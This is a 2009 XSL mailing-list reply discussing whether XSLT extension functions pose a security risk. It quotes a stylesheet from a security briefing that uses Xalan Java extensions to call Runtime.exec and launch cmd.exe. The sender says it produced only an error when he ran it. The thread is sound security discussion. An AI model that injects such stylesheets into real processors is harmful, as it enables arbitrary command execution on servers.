Re: [xsl] Can an XSLT document invoke arbitrary extension functions?

Subject: Re: [xsl] Can an XSLT document invoke arbitrary extension functions?
From: Dimitre Novatchev <dnovatchev@xxxxxxxxx>
Date: Mon, 26 Oct 2009 14:42:32 -0700
An XSLT transformation is just a program execution.

Allowing unknown programs to run on a box is a security issue of *that
box*, not a security issue of the programming language, in which the
program is written.


--
Cheers,
Dimitre Novatchev
---------------------------------------
Truly great madness cannot be achieved without significant intelligence.
---------------------------------------
To invent, you need a good imagination and a pile of junk
-------------------------------------
Never fight an inanimate object
-------------------------------------
You've achieved success in your field when you don't know whether what
you're doing is work or play





On Mon, Oct 26, 2009 at 1:40 PM, Costello, Roger L. <costello@xxxxxxxxx>
wrote:
>
> Hi Folks,
>
> Below is an XSLT transform that - supposedly - opens a DOS command prompt. I
saw the XSLT transform in this [1] briefing (slide 132). I ran it. It doesn't
work; it just produces an error.
>
> The briefing seems to suggest that XSLT is riddled with security leaks, as
any XSLT transform can invoke pretty much any arbitrary function (apparently
including, as the below XSLT transform shows, any arbitrary Windows
function).
>
> Questions:
>
> 1. Should the below XSLT Transform work? (i.e. is there simply a minor bug
in it, that when fixed, would make it operate as desired?)
>
> 2. Is there any control over the set of extension functions provided by XSLT
processors?
>
> 3. How do you respond to the briefing's suggestions that XSLT is riddled
with security leaks? (I realize this is a broad question; any thoughts you
have would be appreciated)
>
>
> <?xml version="1.0"?>
> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform";
> B  B  B  B  B  B  B 
B xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime";
> B  B  B  B  B  B  B 
B xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object";
> B  B  B  B  B  B  B  B extension-element-prefixes="rt ob"
> B  B  B  B  B  B  B  B version="1.0">
>
>
> B  B <xsl:template match="/">
> B  B  B  B <xsl:variable name="runTimeObject" select="rt:getRuntime()"/>
> B  B  B  B <xsl:variable name="command"
> B  B  B  B  B  select="rt:exec($runTimeObject,
&apos;c:\Windows\system32\cmd.exe&apos;)"/>
> B  B  B  B <xsl:variable name="commandAsString"
select="ob:toString($command)"/>
> B  B  B  B <xsl:value-of select="$commandAsString"/>
> B  B </xsl:template>
>
> </xsl:stylesheet>
>
>
> /Roger
>
>
> [1]
https://www.isecpartners.com/files/iSEC_HILL_AttackingXMLSecurity_bh07.pdf

Current Thread